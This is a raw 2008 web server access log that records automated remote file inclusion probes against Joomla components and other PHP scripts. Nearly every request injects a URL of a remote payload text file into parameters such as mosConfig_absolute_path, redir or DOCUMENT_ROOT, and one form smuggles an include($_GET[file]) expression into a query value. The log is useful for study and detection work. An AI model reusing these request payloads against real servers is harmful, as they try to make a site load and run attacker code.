211.234.110.170 - - [19/Nov/2008:04:46:58 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:46:59 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:46:59 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:04 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:47:05 -0800] "GET /logs/access_080923.log/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:07 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:47:07 -0800] "GET /logs/access_080923.log/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:07 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:08 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:09 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:04:47:10 -0800] "GET /logs/access.log/index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:47:11 -0800] "GET /index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:47:11 -0800] "GET /logs/index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:13 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:14 -0800] "GET /logs/access_080911.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:15 -0800] "GET /logs/access_080911.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:15 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:15 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:15 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:16 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:16 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
211.234.110.170 - - [19/Nov/2008:04:47:18 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:19 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:19 -0800] "GET /logs/access_080911.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:20 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:20 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:23 -0800] "GET /logs/access_080911.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:23 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:47:24 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:47:29 -0800] "GET /logs/access_080923.log/index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:47:40 -0800] "GET /logs/access.log/index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:04:47:41 -0800] "GET /index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:04:47:42 -0800] "GET /logs/index.php?redir=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:47:55 -0800] "GET /logs/access_080922.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:47:55 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:47:55 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:50:00 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
83.222.23.200 - - [19/Nov/2008:04:50:43 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:51:41 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:51:41 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:51:41 -0800] "GET /logs/access_080922.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:52:34 -0800] "GET /logs/access_080923.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:04:53:31 -0800] "GET /logs/access.log%20%20//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
206.225.91.21 - - [19/Nov/2008:04:53:31 -0800] "GET /logs//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
206.225.91.21 - - [19/Nov/2008:04:53:31 -0800] "GET /include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
206.225.91.21 - - [19/Nov/2008:04:53:35 -0800] "GET /include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:04:53:35 -0800] "GET /logs//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:04:53:35 -0800] "GET /logs/access_080911.log%20%20//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:04:54:14 -0800] "GET /logs/access_080929.log%20%20//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:55:30 -0800] "GET /logs/access.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:55:30 -0800] "GET /index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:04:55:30 -0800] "GET /logs/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.nyassemblygop.org"
83.222.23.200 - - [19/Nov/2008:04:55:31 -0800] "GET /logs/access_081022.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
83.222.23.200 - - [19/Nov/2008:04:55:32 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
83.222.23.200 - - [19/Nov/2008:04:55:32 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:04:56:47 -0800] "GET /logs/access_080911.log%20%20//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:04:56:47 -0800] "GET /include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:04:56:47 -0800] "GET /logs//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
83.222.23.200 - - [19/Nov/2008:04:57:14 -0800] "GET /logs/access_080920.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:57:57 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:57:57 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:57:57 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:04:57:57 -0800] "GET /logs/access.log%20%20//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.147.116.24 - - [19/Nov/2008:04:57:57 -0800] "GET /include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.147.116.24 - - [19/Nov/2008:04:57:57 -0800] "GET /logs//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.147.116.24 - - [19/Nov/2008:04:58:24 -0800] "GET /logs/access_080929.log%20%20//include.php?path[docroot]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:58:28 -0800] "GET /logs/access_081002.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nyassemblygop.org"
219.85.63.226 - - [19/Nov/2008:04:58:28 -0800] "GET /logs/access_081009.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:04:59:02 -0800] "GET /logs/access_081021.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:04:59:03 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:04:59:59 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:07:41 -0800] "GET /logs/access_081021.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:07:42 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:08:33 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:05:08:49 -0800] "GET /logs/access_080923.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:05:08:51 -0800] "GET /logs/access.log//?_zb_path=http://www.enjoykankoku.jp/parti/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:05:08:51 -0800] "GET /?_zb_path=http://www.enjoykankoku.jp/parti/did.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:05:08:51 -0800] "GET /logs//?_zb_path=http://www.enjoykankoku.jp/parti/did.txt? HTTP/1.1" 200 3946 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:05:09:27 -0800] "GET /logs/access.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:05:09:29 -0800] "GET /logs/access.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:05:09:29 -0800] "GET /index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:05:09:29 -0800] "GET /index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.nyassemblygop.org"
72.30.79.98 - - [19/Nov/2008:05:09:53 -0800] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.nyassemblygop.org"
213.230.206.6 - - [19/Nov/2008:05:10:03 -0800] "GET /logs/access.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:05:10:04 -0800] "GET /logs/access_080923.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.nyassemblygop.org"
121.78.225.23 - - [19/Nov/2008:05:10:17 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nysracc.com"
121.78.225.23 - - [19/Nov/2008:05:10:17 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nysracc.com"
121.78.225.23 - - [19/Nov/2008:05:10:18 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:05:10:20 -0800] "GET /logs/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:05:10:20 -0800] "GET /index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.nysracc.com"
213.230.206.6 - - [19/Nov/2008:05:10:40 -0800] "GET /logs/access_080923.log/index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:11:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
89.218.85.18 - - [19/Nov/2008:05:12:03 -0800] "GET /logs/access_080926.log/modifyform.html?code=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:12:03 -0800] "GET /modifyform.html?code=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:12:03 -0800] "GET /logs/modifyform.html?code=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:14:25 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:14:25 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:14:25 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:14:25 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:14:26 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.75.209.39 - - [19/Nov/2008:05:14:27 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
72.52.170.160 - - [19/Nov/2008:05:15:31 -0800] "GET /logs/access_080929.log/include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
72.52.170.160 - - [19/Nov/2008:05:15:31 -0800] "GET /logs/include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
72.52.170.160 - - [19/Nov/2008:05:15:31 -0800] "GET /include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
72.52.170.160 - - [19/Nov/2008:05:15:32 -0800] "GET /logs/access_080920.log/include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:16:54 -0800] "GET /logs/access_081022.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
